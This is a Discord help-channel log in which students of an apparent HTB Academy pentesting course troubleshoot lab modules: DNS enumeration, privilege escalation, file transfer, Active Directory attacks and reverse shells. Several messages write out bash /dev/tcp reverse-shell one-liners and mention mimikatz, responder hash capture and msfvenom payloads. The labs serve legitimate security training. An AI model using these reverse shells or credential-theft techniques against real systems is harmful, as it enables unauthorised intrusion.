#modules

1 messages Ā· Page 95 of 1

vivid igloo
#

and ma ke sure that u are using the right ip addres

deft harbor
#

n00b question: in the Web Requests -> POST module, I'm struggling a little bit with completing the exercise. The prompt is "Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php' ", which I've done as far as I can tell but am not seeing the flag. As far as I can see the command works (and I can query on cities and get a result), but if I look for 'flag' (or variants) or any obvious flag segments (e.g., '{"search":"HTB"}') I get nothing back (same response as if I search for a nonsense term, which I take to mean that there are no matches to my query in the databse). Do I need to do something to get the flag inserted in that database for me to pull out (as in the API section that follows?)

rustic sage
#

Im trying to access to rdp y have this issue somebody know how to solve it?

torn blade
#

I am just trying to recreate what is in the instructions in this module before i try going for the flag but im doing the exact same thing but not getting the same results

#

like i have the dtd file, and have the code the same but its not grabbing the information

#

i tried finding the flag the other way suggested in the module but got no dice

rustic sage
#

Hi guys I leave my contribution since it cost me a little to do it and I want to share it module || Bash scripting || question --> Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints the number of characters of the 35th value generated from the variable "var". Send the number as a response.

autumn pilot
autumn pilot
rustic sage
#

I will keep this in mind for the next one šŸ™‚

gentle lark
#

@vivid igloo Thanks! It works. I onle need to be patient. Shell does“nt open inmediatly. Need to wait few time to receive reverse shell. That was the initial problem.

torn blade
solid pewter
#

Hello who can i contact about having VPN problems and its not connecting. Thanks

autumn pilot
lyric notch
#

ducking shit the last question was mean ... hate you all pepe_love

frail gale
#

is anyone's burp suite > open browser taken an extremely long time to load the machine target's IP?

fixed. went to normal firefox browser and it seemed to work fine through that.

torn blade
#

are you getting a host error

frail gale
#

I'm using pwnbox as well.

obtuse quest
#

Windows file transfer methods!!
Hey everyone, I have a couple questions about this module, I have finished all exercises and understand everything, it’s pretty straight forward.
With that being said, I wanted to practice a little more at the end and decided to go through some of the power shell examples and also the SMB upload example. None of the methods described from the course work are working properly. I am getting a ton of powershell errors when trying the SMB upload methods, along with the powershell web uploads. I have tried the suggested powershell ā€œerrorā€ fixes in the course work but that didn’t do anything. Has anyone experienced the same issue?

rare topaz
#

send screenshots of the errors and what not

obtuse quest
jolly rock
#

Can someone please help me out with the last bit of the DNS module, im trying to find out "What is the FQDN of the last octect that ends with x.x.x.203"

#

The hint is "Remember that different wordlists do not always have the same entries." and i have tried a load of other wordlists but nothing is getting me the answer

obtuse quest
#

You have to use a specific word list

#

One sec.

jolly rock
#

I have tried all the ones in Seclists/DNS/ directory

obtuse quest
#

Using dnsenum right?

jolly rock
#

yup thats the one

obtuse quest
#

Also you can brute force sub domains found in DIG -AXFR zone transfer

#

Have you checked those out?

jolly rock
#

I think i get what you mean

#

I believe I have done that

#

and stumbled across in*****l.inlanefreight.htb

obtuse quest
#

try ones like dev.inlanefreight.htb

jolly rock
#

okay ill try that

obtuse quest
jolly rock
#

awesome thank you so much

#

I'll try a bit harder and see where I get

rustic sage
#

I need help in attacking common services module in sql databases section can someone tip me does the password is in some of the databases available

#

I stuck in this section

jolly rock
#

got it!

#

thanks @obtuse quest

obtuse quest
#

No problem! that was a bit too tricky. Glad to help, I remember it gave me issues as well

acoustic owl
vivid igloo
acoustic owl
vivid igloo
#

yes yes

vivid igloo
acoustic owl
pastel lance
heady geyser
#

for the last couple of days, when i try to xfreerdp to a machine i get a black screen and an error stating 'certificate verification failure'. i've restarted the box, ive restarted my machine, but no luck. any ideas? command i run is xfreerdp /v:10.129.157.96 /u:'htb-student' /p:'Academy_student_AD!'

#

xfree was working fine up until yesterday

vivid igloo
#

nither grep nor find

heady geyser
vivid igloo
#

i used it already with the user htb-student

acoustic owl
pastel lance
acoustic owl
pastel lance
#

It’s not flag1.txt

rustic sage
vivid igloo
acoustic owl
#

read the post from jp3g

vivid igloo
acoustic owl
vivid igloo
#

why it's not giving me the flag then

acoustic owl
#

because your command is incorrect

vivid igloo
#

find / -name flag1.txt

#

?

#

is this wrong ?

vivid igloo
acoustic owl
#

Try it with wildcards

vivid igloo
ashen umbra
#

For some reason I cannot reach the vHosts:
vHosts needed for these questions:

app.inlanefreight.local
dev.inlanefreight.local

this is in the active infrastructure identification.
the target IP provides info on dig/ns/whatweb etc, but those two vHosts give me nothin but cant resolve.

acoustic owl
ashen umbra
#

DNS BUNNY I CALL TO YOU AGAIN

#

ahhhhh

acoustic owl
ashen umbra
#

where was the hosts file again? etc/avahi/hosts?

acoustic owl
acoustic owl
#

Windows: depends on the version

rapid sparrow
#

I got stuck on this

#

Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users TGT did you collect?****

#

I used mimikatz to dump the TGT, and submit the number of TGT, and it is incorrect..

rustic sage
#

@acoustic owl what to do with responder

fiery berry
acoustic owl
rapid sparrow
zinc marsh
#

someone got dehashed to work?

#

The git repositories I installed don't work

whole grotto
#

Hi everyone! Do you know how I can recover a file while connected to another with evilwinrm?

acoustic owl
analog dock
#

Rdp seems broken

#

Doesn’t work on pwnbox nor my kali vm

zinc marsh
#

am trying to get the mail for Charles Smithson

acoustic owl
zinc marsh
#

maybe I needed to write the password manually

whole grotto
#

In the password attack module the lab_hard i found a logins.kdbx file, and just want to know if i do things properly. I convert the file with keepass2john and then i use the mutated password file to crack the file

acoustic owl
ashen umbra
#

oh my my. now I cannot find inlanefreight.htb on active subdomain enumeration.
tried nslookup:
nslookup -query=A inlanefreight.htb
Server: 1.1.1.1
Address: 1.1.1.1#53

** server can't find inlanefreight.htb: NXDOMAIN

used Dig and got:

dig any inlanefreight.htb

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> any inlanefreight.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14448
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;inlanefreight.htb. IN ANY

tried adding the target ip in etc/hosts with inlanefreight.htb as the name.

whole grotto
whole grotto
zinc marsh
#

i thought u was ahead mb

zinc marsh
#

and open the file

acoustic owl
whole grotto
fresh compass
#

Hi! I’m stuck in the getting started module, in the knowledge check section. It’s a Getsimple CMS app (I already know the version too) and I have the administrator credentials, but I want to upload a shell file but the upload file button isnt working (because of flash player). Any help?

ashen umbra
#

yeah figured adding this one to etc/hosts would fix that, but it doesn't work. Tried looking for the NS. it no work either.

DNS strikes again

acoustic owl
zinc marsh
#

i just transfered the file with smbserver

ashen umbra
potent harbor
#

Hi, I am doing Windows Fundamental Module. One of the question was asked ( What is the name of the service associated with Windows Update? ). Does anyone know what is the service associated ? I tried google but failed.big_think

acoustic owl
ashen umbra
#

makes good sense I would say

rapid sparrow
#

lmao just see this twitch live from OffSec
kinda familiar with this, where I have been see this before? 🧐

whole grotto
acoustic owl
ashen umbra
rapid sparrow
#

it is hard to do that imo, text always more detail than video, and video makes you slower the progress to learn from my experience...

acoustic owl
#

After all, the lessons are structured in such a way that the module teaches you the knowledge, but then you have to apply the knowledge you have learned and not just copy and apply commands.

With a video, exactly this concept would be lost.

ashen umbra
# fresh compass Nobody?

is it just not showing you anything when you press the button? have you tried navigating to the index page, looking for uploads, and checking if it was uploaded without giving you any feedback?

fresh compass
#

Yes, and there is no way of upload a file

acoustic owl
fresh compass
rapid sparrow
acoustic owl
#

What should the video show you that the text does not?

#

What is this script?
A module is not installed on your machine

#

pip is from python 3
For your Script you use python 2

#

If you want to watch video, check out ippsec's videos. He explains his procedure in his videos.

whole grotto
acoustic owl
#

Look at the output, then you know what was done.
I have marked the places in yellow

#

Note: pip 21.0, in January 2021, removed Python 2 support, per pip’s Python 2 support policy. Please migrate to Python 3.

https://pypi.org/project/pip/

whole grotto
#

@acoustic owl Ty i found the keepass but now when i try to log in smb i can't

rustic sage
#

hey i am new here

#

i want to know abut this world of hacking

tepid arrow
#

AFAIK - Pip was just symlinked to the operating systems default python version. Not necisarrily python2.

acoustic owl
naive field
#

im doing web proxies skill assesment and doing lucky.php

#

im trying this

#

ive setn it like 30 times

#

but i never get the flag...

proud pine
thorn urchin
#

also also its rng so you could theoretically do it like a 1000 times and be unlucky and never get it lul

#

personally id cheat and use ffuf but pipe it through burp to capture the requests, filter out by size and then kick back and wait for the flag

naive field
#

but nothing lol

#

i've also added an HTB match when i get flag

#

but shi

#

its the only flag ion have lol

acoustic willow
#

You have combined a GET and POST request ?

#

If you want to send a POST request delete parameters getXXX=true after / and write it in the end of the request

#

it sounds so strangely

magic widget
#

Anybody done the Firewall and IDS/IPS Evasion - Easy, Medium and Hard Labs within the Network Enumeration with Nmap module - Struggling to get the right nmap switches, so was wondering if someone could clarify the evasion tactics?

#

Cheers!

waxen lynx
#

Hi all. I am having trouble with void challenge lab on HTB. Can you help me the walkthrough for this lab. Thank you very much

waxen lynx
#

I don't have permission to access this channel. How can i access it?

zinc marsh
#

to indentify in the discord

gusty zinc
#
Module: File Inclusion
Section: PHP Filters
Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer

I think this question may be worded poorly. The module talks about fuzzing directly off of ip:8080/FUZZ

#

but- theres nothing there

#

can anyone give me a nudge on this

#

I suspect what they actually want you to do is fuzz the LFI location, which the module does not cover

acoustic willow
#

/FUZZ.php ?

rough comet
#

Hello folks. I finished the MSSQL part of the Footprinting module. But I can't make the suggested nmap scripts to work. The nmap MSSQL scripts seems to be broken. I even updated nmap and still not working. I try to do something similar in my own Kali box (was using PWn box) and still does not work.

#

I try to not use metasploit too much and rely on nmap when I can, hence my interest in knowing what's wrong.

#

PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2019
|_ms-sql-config: ERROR: Script execution failed (use -d to debug)
|_ms-sql-empty-password: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dac: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-tables: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dump-hashes: ERROR: Script execution failed (use -d to debug)
|_ms-sql-hasdbaccess: ERROR: Script execution failed (use -d to debug)
|_ms-sql-xp-cmdshell: ERROR: Script execution failed (use -d to debug)

#

I get all these "debug" errors

rough comet
#

You mean, updating nmap?

#

I think I did it.

iron plaza
#

suggest removing it and doing a clean install of nmap

#

also upgrade the OS

rough comet
#

You are the man! Thanks @iron plaza . Removing, Updating Os, then reinstall, fixed my problem. I was just updating nmap.

dull vortex
#

Can I dm someone about the Attacking Common Services Easy lab, I am at the last step but I keep getting errors?

zinc marsh
#

Attacking Common Applications - Thick client applications

#

Do I need procmon?

dull vortex
rustic sage
#

OSINT: Corporate Recon
Question: Which version of WordPress is used on the Inlanefreight domain page? - Technologies in Use

I believe this question is broken.

I have had no trouble with the tricks in this module, and i dont think this one is a trick.
@rustic sage

#

If someone has the answer to OSINT: Corporate Recon Wordpress version, may I dm you please?

Ive now completed everything but this question. Would really appreciate the help.

pulsar needle
#

Yes

proud pine
#

press enter

hollow hinge
rustic sage
#

This can be solved with enter. But another problem is with some windows boxes explorer will keep closing automatically every few minutes. It's extremely annoying.

#

Yeah some boxes are a real mess unfortunately.

rustic sage
#

This section is so dumb and unreal

fiery berry
rustic sage
#

For exec master..xp_subdirs

#

To capture the ntlm hash with responder

fiery berry
rustic sage
rustic sage
candid ocean
#

Active Directory Enumeration & Attacks
Bleeding Edge Vulnerabilities
Print Nightmare vuln
I've started the listener
I've hosted the DLL
When i attmpte to execute the exploit
It auths to the SMB server just fine - but I get an error of ERROR_FILE_NOT_FOUND - without and real description as to what file.
ANy help appreciated

#

And ofcourse - After hours of smashing my head I work it out within 5 seconds of posting to discord >.< hahaha

pastel lance
#

Could I get a sanity check on the first skills assessment for ā€œActive Directory enumeration and attacksā€ for the question that asks me to find a users clear text password? Using blo** hou** I figured out the user, and the attack they can perform but I’m unable to find the clear text password. I used snaffler to search but it’s come back empty. I am on the right path to be looking for plain text files?

#

Also search for all shares and they came back with nothing useful

#

Been manually searching as well but that’s not doing good either t

tall birch
#

Hi need help with this tiny thing:
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

#

based on my understanding of FQDN I can't find the ans that the box accept

acoustic owl
tall birch
acoustic owl
runic inlet
#

hello everybody

#

i tried to ping app.inflanefreight.local but its not working and i added the host to to vi etc file. still not working

#

does sb why?

pastel lance
#

Are u on the vpn?

#

And specifically the academy vpn?

runic inlet
acoustic owl
runic inlet
acoustic owl
# runic inlet vi etc/host

vi is the editor and not the file šŸ˜‰
etc/ or /etc/?
/etc/host or /etc/hosts?

I just want to make sure you made the entry in the right place

runic inlet
#

it was etc/hosts

#

is there diffrence ?

pastel lance
# runic inlet is there diffrence ?

etc/host = relative path so if there is an etc folder in ur current directory then it will edit there. /etc/host is the absolute path which points to the correct file

runic inlet
rare topaz
#

I'm not sure if you accidentally made duplicates, deleted the file, overwrite it or what, but just do that to be sure

#

issue should be resolved, OP mispelled inlane as inflane

#

this is why i always ask for screenshots

#

?

#

is bro deleting his own messages

fathom jasper
#

nvm.. yes i am.

rare topaz
#

u solved it?

fathom jasper
#

yes... i forgot to also add the domain name to the hosts file in addition to the dc name

#

just got it to work

rare topaz
#

nice, issue resolved

fathom jasper
#

i like when i can resolve myself.. lol

rare topaz
#

its always when you ask for help, do you fix it urself

cursive zinc
#

hello somebody know to express GiB in format:000?

kindred loom
#

hello somebody know about the last question about splunk module and intro section?

rustic sage
#

Can somebody help me with attacking dns section in attacking common services module

rustic sage
#

Dns zone transfer

#

I found subdomains and try on every of them

#

It gives me transfer failed

#

I also add ip and domain in /etc/hosts file also didn't work

acoustic owl
rustic sage
#

Yes i know

#

But how to get the flag

acoustic owl
rustic sage
#

I do this to check everything to get to work

#

I do everything and nothing work

zinc marsh
#

Attacking Common Applications - Attacking Thick Client Applications -- I cannot even do the first step, someone could help me please.

tawny zealot
zinc marsh
#

with procmon

#

And it doesn't create the .bat file in cybervaca either

mild glade
kind fern
#

I'm stuck in module "ACTIVE DIRECTORY ENUMERATION & ATTACKS" part "Credentialed Enumeration - from Windows" the question is "What is the password for the database user?", what method should I use to find it?

pastel lance
#

In the section

dull vortex
#

Can I get some help on getting my shell to work in the Attacking Common Services Easy lab? I am very close but keep getting a white screen with sql, or an error with ftp.

dusk hemlock
#

I did not get any cubes after the HTB Season ends how to fix that?

#

@urban sage

pliant flower
#

Hi, I'm on "Getting Started" - public exploits. So I found exploit: scanner/http/wp_simple_backup_file_read
I've changed rhosts, rport and filepath as it should be, but when I run exploit I can't see that any file has been saved on my VM. Do anyone know why that might be?

urban sage
dusk hemlock
#

ok šŸ™‚

zinc marsh
quiet notch
#

Hi there

mint nebula
#

I need help if someone can help please dm

west night
#

Hi @acoustic owl . Stuck on the Nessus skills assessment in the Vulnerability assessment module. Followed the instructions and my completed scan looks like this (see screenshot). Am I on the right track? I can't seem to answer any questions with the output provided. Any hints would be appreciated.

mint nebula
#

Can someone help me

fiery berry
mint nebula
#

It’s not a question I need help with something

#

No I’d rather not

fiery berry
#

I thought was correlated to any of the academy modules

mint nebula
#

Please

#

I sent a dm plz answer it

#

Some help please dm me

zinc marsh
#

Attacking Common Applications - Attacking Thick Client Applications -- I cannot even do the first step, someone could help me please.

rustic sage
#

does anybody complete the section attacking dns in attacking common services module because i need help

kind fern
west spindle
#

Hey,

I'm stuck on the BloodHound skills assessment, the last question,

Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).

I tried to follow the below link [0], and tried to issue the following query:

MATCH (totalUsers:User {domain:'INLANEFREIGHT.HTB'})
MATCH p=shortestPath((UsersWithPath:User {domain:'INLANEFREIGHT.HTB'})-[r*1..]->(g:Group {name:'<FAILD THIS????>'}))
WITH COUNT(DISTINCT(totalUsers)) as totalUsers, COUNT(DISTINCT(UsersWithPath)) as UsersWithPath 
RETURN ROUND(100.0 * UsersWithPath / totalUsers * 100) / 100 AS percentUsersToGlobalAdmins

But I guess I failed FAILD THIS???? in the above query, can anyone help me or give me a hint?

thank you in advance šŸ™‚

[0] https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

Bloodhound uses Neo4j, a graphing database, which uses the Cypher language. Cypher is a bit complex since it’s almost like programming with ASCII art. This cheatsheet aims to cover some Cypher quer…

dull vortex
#

I have my webshell on the Attacking Common Services easy lab, but I am unabl to turn it into a reverse shell. Can I get a nudge on this?

vagrant gust
#

any reason im getting this error?

heady tusk
#

are you sure that user has access to DC01?

vagrant gust
heady tusk
dull vortex
# heady tusk what did you try so far?

I have tried: from the web shell, creating payload with msfvenom, and then trying to call the file from the webshell and catch it with a netcat listener. I have also tried using reverse shell generator, and uploading the code through the sql method but I am getting errors.

dull vortex
heady tusk
dull vortex
heady tusk
#

umm what

dull vortex
heady tusk
#

well yeah it's an exe file. windows knows how to execute these, but the webserver doesn't

#

but since your webshell is working, you know a way to get the webserver to execute stuff šŸ˜‰

dull vortex
#

I have been trying other methods, but it doesn't seem to be working, it just hangs up... can I dm you the screenshot, I dont want to spoil it?

heady tusk
#

sure

fathom pendant
#

@long grove please stop dming me questions and ask here. I am not accepting dms

heady tusk
#

you still need another set of credentials that you haven't found yet. bloodhound can help you out here

rapid sparrow
#

I stuck in password attack the assessment easy one

#

Examine the first target and submit the root password as the answer.

#

I am not sure whether this is right or not

heady tusk
#

sure thing šŸ™‚

heady tusk
vagrant gust
#

u can get someone elses credentials first

heady tusk
vagrant gust
#

idk if thats tmi

fathom pendant
rapid sparrow
fathom pendant
#

Then maybe you need to look for other users

heady tusk
#

indeed, but that shouldn't stop you

rapid sparrow
red current
#

Anyone have any hint or clue as to how to find the flag in the Containers section in the Linux Privilege Escalation module? I was able to elevate my privileges to root as the section shows, but I've looked everywhere for a flag.txt file and I can't seem to find it anywhere.

vagrant gust
#

ive restarted the box new ip new everything and im getting the same response

red current
#

Never mind. I found it.

fathom pendant
heady tusk
heady tusk
heady tusk
heady tusk
heady tusk
#

that works too I guess

fathom pendant
#

Ssh2john has not been updated to python 3.x so you need to either update the code manually or install python 2.7.x and use that

#

ĀÆ_(惄)_/ĀÆ

vagrant gust
#

thanks mate

heady tusk
#

it uses b64decode instead

vagrant gust
novel shoal
#

Hello I have the problem with Linux Privilege Escalation at section Logrotate
stuck at Waiting for rotating access.log...
the command i using: ./logrotten -p ./payload /home/htb-student/backups/access.log
I also tried to add some short content to access.log, and i saw there is new access.log.1,2,3,4,5.... But There is nothing return to netcat that I open for listener
here is the payload i using: /bin/bash -i >& /dev/tcp/10.10.14.79/4444 0>&1
need help!

vagrant gust
#

thanks

heady tusk
foggy light
#

Took me a long time to complete this.
Thanks to goat @acoustic owl for helping me along the way šŸ˜„

iron coyote
#

Could I get a hand with attacking common services - hard? ||I can't login to the SQL server as F outside of the management studio, I get errors using sqsh, mssqlclient & sqlcmd! Am I missing something?||

zinc marsh
vagrant gust
zinc marsh
heady tusk
zinc marsh
#

but it is not really good explained

gusty zinc
#
login bruteforcing
skills assessemnt service login

brute force ssh server

I am using username-anarchy to generate the username list, and I used cupp with just the first and last name of the user. added numbers at the end and also special characters.

I cant get anything to hit. Can someone give me a nudge

iron coyote
foggy light
#

you are doing hard right? There are 4 questions.. which one are you doing right now?

iron coyote
#

I'm trying to compromise the user

#

@gusty zinc you need to include almost no information in cupp for that user. start with the bare minimum & then use the password policy

foggy light
iron coyote
#

yes

foggy light
#

try for mssql with those creds

iron coyote
#

I did, I get errors

foggy light
foggy light
iron coyote
#

can I dm?

#

I don't want to go against rules

foggy light
#

just dont share any creds

#

are you using mssqlclient?

iron coyote
#

yes

foggy light
#

there is 2 kinds of login, domain login and local login .

gusty zinc
#

1 of 1 target completed, 0 valid password found

#

cupp just first and last name - added special characters and numbers

#

then used sed to do the password policy

iron coyote
#

if you did first name last name only then the cupp should be fine

gusty zinc
#

do you want to add spec characters at the end of words?

iron coyote
#

yeah

gusty zinc
#

something isnt right

#

its not working

#

my wordlist ends up being 77 passwords

#

ran again with no hit

zinc marsh
#

If somoene has completed those and could help me please

red current
#

Does anyone have any clues on how to get the logrotten tool to work in the Logrotate section in Linux Privilege Escalation? I'm running into issues with this section and getting the tool to work. I managed to transfer it to the vulnerable linux box but I can't seem to get it to give me a reverse shell.

vivid igloo
#

try to open two terminels of the ssh

#

and then spin the logrotten and then try to echo hi >> access.log in other ssh terminal

#

ayo

#

am stuck with this one question in skill assesment Submit the contents of flag1.txt

#

Linux Local Privilege Escalation - Skills Assessment

#

just tell me one this is the flag is called flag1.txt

#

or flag.txt

#

because i tried all wind cards with find and still got non

#

@acoustic owl

zinc marsh
#

it does not care the name

#

just do find /* -name "flag*.txt"

#

to do that

vivid igloo
#

i did that already

#

still

#

the first flag is missing

#

i got all the flags

vagrant gust
#

how would one get the notes.zip file from root

#

for the protected archives task

vivid igloo
#

i already have root privilege's and i already got all the flags

vagrant gust
#

can i get a hint lol

vivid igloo
vagrant gust
vivid igloo
#

by exploiting sudo

#

it was wayy too easy

acoustic owl
vivid igloo
acoustic owl
vivid igloo
vagrant gust
vivid igloo
#

no

#

check the kernel version

vagrant gust
#

no as in sudo exploit?

vivid igloo
vivid igloo
red current
vivid igloo
vagrant gust
#

im still lost how are people getting the notes.zip file in the protected archives section

vivid igloo
vagrant gust
vivid igloo
vagrant gust
#

appreciate u trying to help tho lol

brazen gyro
#

hi guys im almost finished learning the intro linux course

#

once i finish that what else do i need 2 learn so i can start hacking people

vagrant gust
brazen gyro
#

"Which shell is specified for the htb-student user? "

#

wat is this question asking

#

mean like bash?

rustic sage
heady tusk
rustic sage
heady tusk
#

if I'm not mistaken there is another equivalent representation for that subnet. take a look at the netmask, maybe you can make sense of what I mean

zinc marsh
#

@heady tusk did u get complete thick applications?

heady tusk
#

nah not there yet

#

was hoping you could help me when I get there lol

zinc marsh
#

I am in the skills assessment

#

without doing that two

heady tusk
#

ah well this is gonna be fun then xD

#

alright then, shellshock done, now on to the fun part lol

red current
#

The Miscellaneous Techniques section in Linux Privilege Escalation isn't making any sense. It doesn't give an explanation on how to follow the steps in order to get the flag because it doesn't allow you to remote into the htb@NIX02 box and carry out the commands. Has anyone done this section and could give a hint on what exactly is needed here?

dull vortex
#

I solved the Attacking Common Applications Easy lab, but I don't think I did it either of the intended ways. Can I dm someone to see if I did it correctly?

acoustic owl
#

There is no right or wrong in hacking

#

But send me a dm, then I can show you my way

static roost
#

Anyone confused with the Capabilities section of Linux Privilege Escalation? It says the binary has cap_sys_admin, but it doesn't in the example. I feel like I'm missing something crucial here.

vagrant gust
#

this cant be right can it

thorn urchin
thorn urchin
#

if you did everything correctly go watch a tv show or something for 20ish minutes and come back

#

which is why I hate that module

thorn urchin
#

dont know if you did something wrong till after youve wasted like half an hour

vagrant gust
#

yeah bit of a piss take i agree

zinc marsh
#

someone could help me with those 2

red current
#

I'm still not understanding what to do in the Miscellaneous Techniques section in Linux Privilege Escalation. Can anyone give me some assistance with understanding what is needed here? It just isn't making any sense.

red current
#

Never mind. I figure it out.

vagrant gust
#

Whats like the sweet spot for threads in hydra?

heady tusk
#

highly depends on the service you're bruteforcing. it'll usually tell you how much it recommends for the service it's running against

muted fiber
#

Hey people, I'm writing here cause I'm pretty desperate for some hints at this point, I've spent much more time that I would like to admit on the "Hacking Wordpress" module at the very final flag of the final section which demands: Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.
The closest I've got was using msfconsole and an exploit named wp_admin_shell_upload as suggested in one of the previous sections of the module, but every time i try to execute the run command it actually won't upload the payload and just crashes for some reason I really can't figure it out, would anyone help please?

acoustic owl
muted fiber
zinc marsh
#

ty for the help @heady tusk

vestal horizon
#

Hello i keep getting sub failed for academy when i have enough fund to sub.help anyone ?

fringe shell
vestal horizon
pastel lance
#

In Active Directory Enumeration & Attacks, for skills assessment part II, I wasn't able to import the powerview module. Ive tried a few different methods but been unsuccessful. Is this intentional or do I just need to try harder? I feel like I need it to get the second user but maybe im just not living off the land enough

pastel lance
#

You add 2 | symbols next to each other at the start and end of the text u went to mask

#

I think the server decides what emojis are allowed? I’m not sure lol

#

Btw we’re u able to get power view to work on ms01?

#

I’m on same section as u

#

Which emoticon are u trying to use? I could see if it works for me

#

Yep works for me

#

Hold down on the message ?

#

Hm ok I’m missing admin creds then

#

I was thinking it had antivirus or something lol

#

Well I used the first user a**** creds and it didn’t let me run poweshell as admin

#

Maybe I mistyped something in the pop up. I’ve been up too long without sleep pika

#

U don’t have this?

#

Not there yet lol 🤧 I just got managed to get the password for the b*** user

#

I’m eating breakfast rn but I will come back in like 30 minutes

vital adder
#

so you have pwn the DC01 and got the Administrator user hash but you are having issue logging in with that hash?

#

i think i have a typo in my note so give me a sec i'll double check some stuff and send you a dm

scarlet iris
#

Does anyone has the same problem with machines in Windows Privilege Escalation Skills Assessment? I cant connect to them with vpn or pwn box. Machine is other parts of this module are working

gaunt monolith
#

In Attack common service - RDP Connect to admin machine using rdp in hint I know should use another way to log in without username an passwords so in ||registry editor I set Limit blank password to 0 but still accept password to log in || Can I find another way to log in or something wrong in my road?

vital adder
vital adder
tulip jasper
#

Hello! Not sure if this is the best place to ask. I am doing the Getting Started module and I'm down to "Nibbles - Privilege Escalation". Up until this point I was able to get a reverse shell, but all of a sudden it started timing out. Whenever I access the image.php it just loads and times out. Does anyone know why? I was so close to getting the root flag and I'm stuck for a few hours on this. I've reset the target a few times but with the same result.

vital adder
#

if you can still access the target web site and you are following the previous section to get a shell you can just try to upload a different image

tulip jasper
rare topaz
#

whats in image.php

vital adder
vital adder
vital adder
rare topaz
#

could also be ur target expired

#

lol

tulip jasper
vital adder
rich flint
#

Does anyone know how i can find this?

tulip jasper
rare topaz
#

can you curl the webpage

acoustic owl
tulip jasper
#

I tried curl and it doesn't show anything in netcat

rich flint
rare topaz
rare topaz
vital adder
rare topaz
rich flint
#

"How do I earn money?" Go to where money is usually stored bro

rare topaz
#

you can just google where is mail stored in linux

rare topaz
acoustic owl
tulip jasper
vital adder
vital adder
# tulip jasper Do you mean something like this?

if your target are still running fine just upload a different payload and try again if you still get nothing try reset your target and use a different payload if the pentest monkey payload keep giving you issue

rare topaz
tulip jasper
vital adder
#

so your issue is the shell die after a few sec of you getting one right?

analog dock
vital adder
#

@tulip jasper and by getting a meterpreter shell i don't mean using any exploit but i mean use the web delivery to get a shell

rich flint
gaunt monolith
tulip jasper
vital adder
rich flint
#

i found this but there is nothing else there

rare topaz
vital adder
rare topaz
#

I have no idea why you are being like this my guy.

analog dock
rare topaz
muted fiber
rare topaz
vital adder
#

and for real try to ask better question next time if you want any help

rich flint
#

if that makes sense

rare topaz
#

did you read the post i sent you 😭

rich flint
#

1sec

vital adder
rare topaz
#

yeah ur not wrong

#

Usually if a large rev shell doesnt work, i simplify it.

Sometimes it's a lag thing due to academy being 300 ping for me XD

tulip jasper
rare topaz
#

So smaller, simpler payloads help

rare topaz
vital adder
tulip jasper
#

Initially I was using the one liner from the module. But that stopped working and then I tried the one from pentestmonkey

vital adder
#

for php though the simplest shell for me is the rce shell that you are using and the one i just send you but for other rev shell if you don't already know you can use https://www.revshells.com/

Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.

tulip jasper
#

It just stays like this..sometimes I get a timeout error in the browser ..what is wrong in there? I used that for "Nibbles - Initial Foothold" and I was able to get the flag and now it's not working anymore.
Update: ignore the arrow from the 23 for the image.php size šŸ˜› I am actually using port 23. Just a concidence there.

#

Also, the target is not expired.

rare spire
#

Hi,

Could someone help me for the "Network Service" section of the "Password Attack" module on HTB Academy. I've been stuck on it for a while.

Thanks in advance

acoustic owl
vital adder
tulip jasper
rare spire
vital adder
rare topaz
#

could be url encoding

#

I also advise to use the bash -c 'bash -i' type of reverse shell.

it's just more stable and works more often in my case.

vital adder
rare topaz
#

try manually encoding then i guess

#

you can just go to a url encoder and url encode it from there

#

but the first pic wasn't url encoded

acoustic owl
vital adder
rare topaz
#

bash -c 'bash -i >& /dev/tcp/<IP>/<Port> 0>&1'

tulip jasper
vital adder
rare topaz
#

do url encode it

rare topaz
#

well use python in that case, since it seems like it worked

#

i might redo the module later to test

tulip jasper
#

could you please share the python version if that worked for you ?

vital adder
vital adder
#

the python3 #2 one

tulip jasper
#

thank you!

muted fiber
#

Hey, has anyone reading this completed the "Hacking Wordpress" module?

rare topaz
vital adder
#

@rare topaz the weird thing is in firefix for a php RCE payload if something loaded it's will be auto url encode and in the case of my python payload it's loaded and worked so it get auto url code but for the other bash and nc payload it doesn't loaded but didn't work but it both doesn't hang and didn't get url encoded

vital adder
#

i think this is one of the first time i saw firefox do something like or maybe the firefox version of the pnwbox is different

vital adder
muted fiber
rare topaz
vital adder
#

@tulip jasper if you want to use the other shell for some reason go on CyberChef pick url encode and check the encode all special chars box and you can use that payload for this if you want

muted fiber
# acoustic owl Yes

Hey there, you are the person that tried to help and I've replied to yesterday
What process did you use to get to the last flag of the last section?
Editing the PHP file as you said is not an option sadly as I said here: #modules message sadglas

acoustic owl
tulip jasper
vital adder
#

wait what? that also doesn't work?

#

oh yeah did you change your payload or are you still using the run id payload?

naive field
#

im dgoin the attacking web apps with ffuf and im on directory fuzzing section, im running command|| ffuf -w wordlist:FUZZ -u http://ip:port/blog/FUZZ|| but its not working?

#

the hint says "All lowercase" lol makes no sense

vital adder
#

if you confirm you have RCE with that payload and both the python payload and the urlcode version of the previous payload doesn't work then i'm out of idea

zinc sentinel
vital adder
#

WTF 🤣

acoustic owl
zinc sentinel
#

Hi payloadbunny
Could you give any advise on attacking common applications- attacking Thick clients applications..
I get to following the memory map in x64gbg and dumping all user maps with -rw--
But always receiving error with de4dot that it's not .net bin file

